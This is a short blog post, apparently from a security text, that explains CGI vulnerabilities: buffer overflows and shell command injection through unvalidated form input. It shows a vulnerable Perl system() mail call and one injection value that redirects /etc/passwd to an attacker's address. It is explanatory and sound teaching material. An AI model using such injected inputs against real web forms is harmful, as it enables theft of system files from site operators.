CGI and WWW Services
As more websites offer interactive services, more CGI and web basedvulnerabilities are being uncovered. CGI vulnerabilities fall into three
categories:
• Buffer overflow.
• Command execution.
• Subverting client side scripting.
Buffer Overflow
Standard buffer overflow techniques can be applied to CGI scripts.Since scripts allow for user input, this input could be used to overflow
buffers in vulnerable programs. This only affects scripts written in
relatively low level languages such as C. Scripts should always perform
validation on all user input and internal functions should do sanity
checking on the size of buffers. Higher level, and more commonly used
scripting languages perform bounds checking on variable and array
lengths internally and will consequently not be vulnerable to buffer
overflow attack. Examples of such languages are:
• Java.
• Perl.
• Python.
Command Execution
Scripts written in higher level languages sometimes contain moreinsidious vulnerabilities than their low level cousins. A common
occurrence of this is command execution on the remote machine. This is
once again caused by poor input validation. For example, CGI scripts
sometimes contain code that executes shell commands such as the Perl
command:
System("mail $email < theTermsAndConditions.txt");
Which is a simple way of mailing a document to a user. In this example
the $email variable will contain an email address that was entered in a
form on the website. If no input validation is done when the user enters
her email address, it will be possible to imbed shell commands into the
input field and have them executed by the system call.
hacker@hack.net < /etc/passwd;
Inserting the above value will cause the password file to be mailed to
the attacker. As with buffer overflow attacks the level of privilege with
which these commands are executed are dependent on the privilege
level of the CGI script.
No comments:
Post a Comment